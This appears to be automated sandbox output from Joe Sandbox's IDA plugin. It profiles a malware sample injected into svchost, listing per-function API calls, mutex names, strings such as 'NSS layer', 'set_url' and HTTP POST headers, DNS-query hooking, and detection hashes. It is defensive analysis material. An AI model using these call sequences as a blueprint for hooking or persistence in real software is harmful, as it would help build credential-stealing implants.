• Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
• Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
Yara matches
Similarity
• API ID: Handle$CloseMutexSleep$BackslashCreateInformationObjectOpenPathReleaseSingleThreadWait
• String ID: 6d1da03d$KBP$Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}$P0Wu
• API String ID: 4173420962-1913664259
APIs
• WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00008001,?), ref: 02C7976E
• ReleaseMutex.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,02C78623,00008001,?), ref: 02C79797
• IsWindow.USER32(?), ref: 02C7979E
• PostMessageA.USER32(?,00000215,00000000,00000000), ref: 02C797B2
• WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00008001,?), ref: 02C79821
• ReleaseMutex.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,02C78623,00008001,?), ref: 02C7983A
• GetWindowLongA.USER32(00000000,000000F0), ref: 02C798CB
• GetParent.USER32(00000000), ref: 02C798E2
• GetWindowThreadProcessId.USER32(00000000,00000000), ref: 02C79929
• GetWindowInfo.USER32 ref: 02C799A1
  • Part of subcall function 02C79030: GetWindowRect.USER32(?,?), ref: 02C79057
  • Part of subcall function 02C79030: IsRectEmpty.USER32(?), ref: 02C790C6
  • Part of subcall function 02C79030: GetWindowLongA.USER32(?,000000F0), ref: 02C790D6
  • Part of subcall function 02C79030: GetParent.USER32(?), ref: 02C790EA
  • Part of subcall function 02C79030: MapWindowPoints.USER32(00000000,00000000,?,02C79754), ref: 02C790F3
  • Part of subcall function 02C79030: SetWindowPos.USER32(?,00000000,?,02C79754,00000000,00008001,0000630C,?,02C79754,00000000,00008001,?), ref: 02C79115
Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Window$LongMutexObjectParentRectReleaseSingleWait$EmptyInfoMessagePointsPostProcessThread
                                                                                                                                                                                                            • String ID: <$P0Wu
                                                                                                                                                                                                            • API String ID: 4123185898-3435678627
                                                                                                                                                                                                            • Opcode ID: 71a270c82cb22c150ca72a1b1f6a01f2ab14ba3d5e97254e997ef960a8183707
                                                                                                                                                                                                            • Instruction ID: 4bcd2f6e1dc22edba24d600672e87dd96ef4d6448a9f883a8d935158106c1083
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 71a270c82cb22c150ca72a1b1f6a01f2ab14ba3d5e97254e997ef960a8183707
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9C911531684341ABD3259F24CC89FAB7BA9AFC5714F044A2DF9668B2D1C7B4C544CBA1
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}), ref: 02C9030C
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02C90319
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02C9032D
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C9033F
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02C90120,00000000,00000000,00000000), ref: 02C90350
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C9035F
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C90366
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6d1da03d), ref: 02C9036D
                                                                                                                                                                                                            • Sleep.KERNEL32(00009C40,6d1da03d,KBP), ref: 02C90387
                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 02C90390
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Handle$CloseMutexSleep$BackslashCreateInformationObjectOpenPathReleaseSingleThreadWait
                                                                                                                                                                                                            • String ID: 6d1da03d$KBP$Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}$P0Wu
                                                                                                                                                                                                            • API String ID: 4173420962-1913664259
                                                                                                                                                                                                            • Opcode ID: 97050be5e3da743c5baca80d7397bbdf7b8c4a97e1dc2b43ffb38693e1ddc740
                                                                                                                                                                                                            • Instruction ID: 2fbf6114131304eca77c357c6b4215e969722fbf4bac548efdacd2700ee22b59
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 97050be5e3da743c5baca80d7397bbdf7b8c4a97e1dc2b43ffb38693e1ddc740
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B301D130AC9795BBFA222B304C0EF4E369CBF45B19F104750F91A661C0DBB499018AAB
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C7DA94
                                                                                                                                                                                                            • StrCmpNIA.SHLWAPI(00000002,?,00000000,?,?,00000000,?,?,?,?,?,?,?,02C7E8FF,?,?), ref: 02C7DAF5
                                                                                                                                                                                                            • StrCmpNIA.SHLWAPI(00000001,?,00000000,?,?,00000000,?,?,?,?,?,?,?,02C7E8FF,?,?), ref: 02C7DBB1
                                                                                                                                                                                                            • memcpy.MSVCRT(?,00000000,?,?,?,Content-Length,?,?,?,00000003,02C7E8FF,?,?,Host,?,?), ref: 02C7DCF3
                                                                                                                                                                                                            • memcpy.MSVCRT(00000000,http://,00000007,?,?,Content-Length,?,?,?,00000003,02C7E8FF,?,?,Host,?,?), ref: 02C7DDAE
                                                                                                                                                                                                            • memcpy.MSVCRT(?,?,00000000,00000000,http://,00000007,?,?,Content-Length,?,?,?,00000003,02C7E8FF,?,?), ref: 02C7DDBF
                                                                                                                                                                                                            • memcpy.MSVCRT(?,?,?,Host,?,?,?,00000000,?,?,?,00000000), ref: 02C7DDF1
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: memcpy$memset
                                                                                                                                                                                                            • String ID: Content-Length$Content-Type$Host$NSS layer$Referer$http://$https://
                                                                                                                                                                                                            • API String ID: 438689982-3158524741
                                                                                                                                                                                                            • Opcode ID: 8d59738fe5088c2eaf57886d77d28275053c8d2c12aedd217a0793f37a8cd660
                                                                                                                                                                                                            • Instruction ID: dd3732c7711ec3d45edace044122e002dbadd5e24b6794fc6baae500f18ee1ff
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8d59738fe5088c2eaf57886d77d28275053c8d2c12aedd217a0793f37a8cd660
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 85D12A76E0025A9BDF25CE68C880BEEBBB5FF85314F144169D857AB240D730DA41CBA5
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: free$closesocket
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3865430558-0
                                                                                                                                                                                                            • Opcode ID: 910a31fd0c6bd9dc90c70c11b12ace9fc46aebbc3afe7f0e71b855cb4b104ca5
                                                                                                                                                                                                            • Instruction ID: bf6d14dd3a9724a07df7cd090e182fe84bab0acc79f7ff47ea8ec59b600bc34a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 910a31fd0c6bd9dc90c70c11b12ace9fc46aebbc3afe7f0e71b855cb4b104ca5
                                                                                                                                                                                                            • Instruction Fuzzy Hash: BC813EB0A00A12AFCB14CF28E888A56B7E4FF48708F184669D81ADB341D735FE55CBD5
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 02C7F0C0: memset.MSVCRT ref: 02C7F114
                                                                                                                                                                                                              • Part of subcall function 02C7F0C0: GetProcessHeap.KERNEL32(00000000,?,?,?,?), ref: 02C7F12C
                                                                                                                                                                                                              • Part of subcall function 02C7F0C0: HeapValidate.KERNEL32(00000000), ref: 02C7F12F
                                                                                                                                                                                                              • Part of subcall function 02C7F0C0: GetProcessHeap.KERNEL32(00000000,?), ref: 02C7F13C
                                                                                                                                                                                                              • Part of subcall function 02C7F0C0: HeapFree.KERNEL32(00000000), ref: 02C7F13F
                                                                                                                                                                                                              • Part of subcall function 02C7F0C0: InternetQueryOptionA.WININET(?,00000022,00000000,-02CBD804), ref: 02C7F15C
                                                                                                                                                                                                              • Part of subcall function 02C7F0C0: GetProcessHeap.KERNEL32(00000008,00000014), ref: 02C7F179
                                                                                                                                                                                                              • Part of subcall function 02C7F0C0: HeapAlloc.KERNEL32(00000000), ref: 02C7F180
                                                                                                                                                                                                              • Part of subcall function 02C7F0C0: memset.MSVCRT ref: 02C7F190
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,02C7FD9B,?,?,?,?,?,?), ref: 02C7F6E2
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,02C7FD9B,?,?,?,?,?,?), ref: 02C7F6E9
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,?,02C7FD9B,?,?,?,?,?,?), ref: 02C7F6F6
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,02C7FD9B,?,?,?,?,?,?), ref: 02C7F6FD
                                                                                                                                                                                                            • HttpQueryInfoA.WININET(?,80000023,?,00000018,00000000), ref: 02C7F716
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,?,02C7FD9B,?,?,?,?,?,?), ref: 02C7F754
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,02C7FD9B,?,?,?,?,?,?), ref: 02C7F75B
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,?,02C7FD9B,?,?,?,?,?,?), ref: 02C7F768
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,02C7FD9B,?,?,?,?,?,?), ref: 02C7F76F
                                                                                                                                                                                                            • HttpQueryInfoA.WININET(?,0000002D,?,?,00000000), ref: 02C7F7A5
                                                                                                                                                                                                              • Part of subcall function 02C7F210: InternetQueryOptionA.WININET(?,00000009,?,?), ref: 02C7F233
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$Query$FreeValidate$HttpInfoInternetOptionmemset$Alloc
                                                                                                                                                                                                            • String ID: POST$T
                                                                                                                                                                                                            • API String ID: 4198387326-1208759463
                                                                                                                                                                                                            • Opcode ID: 99338229d96ef8bf0f3b4d3909b2820c6cba6b496dd30af06a24439a9daa011f
                                                                                                                                                                                                            • Instruction ID: bda962978ceaa05048a9369c1bf0b2edf011d2575adf7fbfcb0148bc20942b15
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 99338229d96ef8bf0f3b4d3909b2820c6cba6b496dd30af06a24439a9daa011f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2A41E471A40345ABD7328FA4DCC8FA777B8AF88715F008A4DE64687980D7B0E644DBA1
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • SetThreadDesktop.USER32(?,75573050,755730D0,75573080), ref: 02C78280
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C78294
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C7829F
                                                                                                                                                                                                            • UnmapViewOfFile.KERNEL32(00000000,?,00000006,00000000), ref: 02C782C7
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C782E4
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C782F5
                                                                                                                                                                                                            • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,02CBD66C), ref: 02C78315
                                                                                                                                                                                                            • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 02C7832C
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 02C7836C
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000,0000007E,?,00000000,?,00000006,00000001,00000000,00000000), ref: 02C783B4
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000,?,00000000,?,00000006,00000001,00000000,00000000), ref: 02C783BD
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$HandleMutexObjectReleaseSingleViewWait$CloseCreateDesktopFreeHeapInformationMappingThreadUnmap
                                                                                                                                                                                                            • String ID: P0Wu
                                                                                                                                                                                                            • API String ID: 2125184990-465009422
                                                                                                                                                                                                            • Opcode ID: 3d0d9e5a832b1a5d5dcd235c828ed90d58ccb9c141292ec40fc273a3ff7295ab
                                                                                                                                                                                                            • Instruction ID: 3d477f1b7a102f56b4d127cad5f1c2a6d0e46db0bc53025ec961f26a942f3015
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3d0d9e5a832b1a5d5dcd235c828ed90d58ccb9c141292ec40fc273a3ff7295ab
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1441A171E80344ABD7119B74EC59F6A77A9EB88711F208F49FA11972C0CB74A920DFA0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000000,?,02C7F84A,00000000,?), ref: 02C7F32B
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,02C7F84A,00000000,?), ref: 02C7F32E
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,?,02C7F84A,00000000,?), ref: 02C7F33B
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,02C7F84A,00000000,?), ref: 02C7F33E
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(?,00000000,00000000,?,00000000,?,02C7F84A,00000000,?), ref: 02C7F357
                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,02C7F84A,00000000,?), ref: 02C7F368
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000000,?,02C7F84A,00000000,?), ref: 02C7F378
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,02C7F84A,00000000,?), ref: 02C7F37B
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,?,02C7F84A,00000000,?), ref: 02C7F388
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,02C7F84A,00000000,?), ref: 02C7F38B
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000000,?,02C7F84A,00000000,?), ref: 02C7F39B
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,02C7F84A,00000000,?), ref: 02C7F39E
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,?,02C7F84A,00000000,?), ref: 02C7F3AB
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,02C7F84A,00000000,?), ref: 02C7F3AE
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$FreeValidate$Handle$CloseInformation
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2935687291-0
                                                                                                                                                                                                            • Opcode ID: d4623eed16cd5b81bbe464dcc97bed0d395a8c6cc79f28935bf282846adab503
                                                                                                                                                                                                            • Instruction ID: c67f42e586b1c9d74857217d00ebd9190e317d3f43df894b3a5983a969eb7d9b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d4623eed16cd5b81bbe464dcc97bed0d395a8c6cc79f28935bf282846adab503
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5431F031E853606BDB25AF61E8C8B5B7BACFF88B25F04856AED09D7240C735C500CAE1
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C80825
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000001,7556F550,75571620,80000002,?,?,02C84818), ref: 02C80872
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,?,02C84818), ref: 02C80875
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,02C84818), ref: 02C80882
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,?,02C84818), ref: 02C80885
                                                                                                                                                                                                            • strstr.MSVCRT ref: 02C8089B
                                                                                                                                                                                                            • strstr.MSVCRT ref: 02C808B9
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,02C84818), ref: 02C808E7
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,?,?,?,02C84818), ref: 02C808EA
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,02C84818), ref: 02C808F7
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,?,?,?,02C84818), ref: 02C808FA
                                                                                                                                                                                                              • Part of subcall function 02C80570: memset.MSVCRT ref: 02C805A3
                                                                                                                                                                                                              • Part of subcall function 02C80570: memset.MSVCRT ref: 02C805BB
                                                                                                                                                                                                              • Part of subcall function 02C80570: RegOpenKeyExA.ADVAPI32(00000001,software\microsoft,00000000,00000101,80000002,?,?,?,?,7556F550,75571620), ref: 02C805DC
                                                                                                                                                                                                              • Part of subcall function 02C80570: RegQueryValueExA.ADVAPI32(80000002,92F35DE2a,00000000,00000001,?,00000104,?,?,?,?,7556F550,75571620), ref: 02C80603
                                                                                                                                                                                                              • Part of subcall function 02C80570: GetProcessHeap.KERNEL32(00000008,?,00000000,?,?,?,?,?,?,7556F550,75571620), ref: 02C8068D
                                                                                                                                                                                                              • Part of subcall function 02C80570: HeapAlloc.KERNEL32(00000000,?,?,?,?,7556F550,75571620), ref: 02C80694
                                                                                                                                                                                                              • Part of subcall function 02C80570: memset.MSVCRT ref: 02C806A3
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$memset$FreeValidatestrstr$AdminAllocOpenQueryUserValue
                                                                                                                                                                                                            • String ID: set_url
                                                                                                                                                                                                            • API String ID: 3462927349-1295111526
                                                                                                                                                                                                            • Opcode ID: cda620ee7f2803b62b935c1a84ab0733a82987d75eb891d8c4ea899b9dbdd7a6
                                                                                                                                                                                                            • Instruction ID: d2685373e9730747ddc9d2bdb1d73698abc7836ff454eabe2fa69123fa625bc9
                                                                                                                                                                                                            • Opcode Fuzzy Hash: cda620ee7f2803b62b935c1a84ab0733a82987d75eb891d8c4ea899b9dbdd7a6
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B6212632E8637567E63236615C09F5B6A889FC0B59F098664ED08BB240EB61DE48C6F1
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}), ref: 02C92A4C
                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 02C92A62
                                                                                                                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}), ref: 02C92A70
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02C92A79
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C92A91
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C92AA3
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6d1da759), ref: 02C92AAE
                                                                                                                                                                                                            • Sleep.KERNEL32(00009C40,6d1da759,VEFK), ref: 02C92AC8
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Mutex$HandleOpenSleep$BackslashCloseInformationPathRelease
                                                                                                                                                                                                            • String ID: 6d1da759$Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}$P0Wu$VEFK
                                                                                                                                                                                                            • API String ID: 849374196-3602550973
                                                                                                                                                                                                            • Opcode ID: c4985611d2668c2d8f8bfd40c92cc39a25d6909fd499e99ca8dcf408cf499dbb
                                                                                                                                                                                                            • Instruction ID: cf5307aaa716208c13d45688a6128ea76d6d682987b08c38524c8f77d182b2d5
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c4985611d2668c2d8f8bfd40c92cc39a25d6909fd499e99ca8dcf408cf499dbb
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6901FE32EC57543BFB22A7619C0DF5A778CAF44B20F044658FD8597181DFB0951046EB
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}), ref: 02C8D9AC
                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 02C8D9C2
                                                                                                                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}), ref: 02C8D9D0
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02C8D9D9
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C8D9F1
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C8DA03
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6d1da28e), ref: 02C8DA0E
                                                                                                                                                                                                            • Sleep.KERNEL32(00009C40,6d1da28e,CRAIF), ref: 02C8DA28
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Mutex$HandleOpenSleep$BackslashCloseInformationPathRelease
                                                                                                                                                                                                            • String ID: 6d1da28e$CRAIF$Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}$P0Wu
                                                                                                                                                                                                            • API String ID: 849374196-938674838
                                                                                                                                                                                                            • Opcode ID: 7abecb2b965fb5de8c60606add3be0048b7e0247f73bcc70fe952d1209e163ae
                                                                                                                                                                                                            • Instruction ID: 104e8e4c2d7b88b54f5b5cd2b4d18fb869c1bcacf3b05097bf7c6afeb6e5f25f
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7abecb2b965fb5de8c60606add3be0048b7e0247f73bcc70fe952d1209e163ae
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F401D632EC47547AF312A7B15C0AF5A738CAF44B28F158664F909A31C1DBB499008AA6
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C75940
                                                                                                                                                                                                            • DnsFlushResolverCache.DNSAPI ref: 02C7594A
                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(Dnsapi.dll,00000000,00000000,75497390), ref: 02C7595A
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,DnsQuery_A), ref: 02C75973
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,DnsQuery_UTF8), ref: 02C7598F
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,DnsQuery_W), ref: 02C759AB
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Query_Main), ref: 02C759C7
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
